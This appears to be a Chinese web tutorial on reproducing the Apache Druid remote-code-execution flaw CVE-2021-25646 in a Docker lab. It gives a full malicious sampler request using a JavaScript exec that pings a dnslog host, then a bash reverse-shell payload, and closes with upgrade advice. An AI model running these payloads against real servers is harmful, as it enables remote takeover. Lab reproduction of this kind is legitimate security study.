您好,登錄后才能下訂單哦!
本篇文章給大家分享的是有關如何進行Apache Druid 命令執行漏洞CVE-2021-25646復現,小編覺得挺實用的,因此分享給大家學習,希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。
Druid 是一個分布式的、支持實時多維 OLAP 分析的數據處理系統。它既支持高速的數據實時攝入處理,也支持實時且靈活的多維數據分析查詢。因此 Druid 最常用的場景就是大數據背景下、靈活快速的多維 OLAP 分析。 另外,Druid 還有一個關鍵的特點:它支持根據時間戳對數據進行預聚合攝入和聚合分析,因此也有用戶經常在有時序數據處理分析的場景中用到它。
在Druid 0.20.0及更低版本中,用戶發送惡意請求,利用Apache Druid漏洞可以執行任意代碼。攻擊者可直接構造惡意請求執行任意代碼,控制服務器。
Apache Druid < 0.20.1
1、本次環境使用docker搭建,需要在虛擬機安裝docker,安裝完成后使用以下命令pull漏洞環境
docker pull fokkodriesprong/docker-druid
2、下載漏洞環境后使用以下命令啟動漏洞環境
docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid
3、啟動后在瀏覽器訪問http://your-ip:8888/看到以下界面表示成功
1、在瀏覽器進入Apache Druid首頁如何點擊點擊左上方Load data -> Local disk按鈕
2、右側表單填入Base directory:(quickstart/tutorial/)File filter:
(wikiticker-2015-09-12-sampled.json.gz)填入完成點擊Preview,然后點擊next
3、打開burp并配置代理,然后一直點擊next,直到下一步是Next:Filter時,抓取數據包
4、然后替換數據包中的data數據為以下代碼,然后修改代碼中的dnslog地址為自己的,點擊發送,查看dnslog是否有數據
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('ping kujqmk.dnslog.cn -c 1')}",
"dimension":"added",
"":{
"enabled":"true"
}
}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}
5、修改dnslog地址為反彈shell的payload,在kali中設置監聽,可以看到成功反彈shell
exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/172.16.1.132/8896 0>&1')
1、升級到最新版Apache Druid,下載地址為
https://druid.apache.org/downloads.html
以上就是如何進行Apache Druid 命令執行漏洞CVE-2021-25646復現,小編相信有部分知識點可能是我們日常工作會見到或用到的。希望你能通過這篇文章學到更多知識。更多詳情敬請關注億速云行業資訊頻道。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。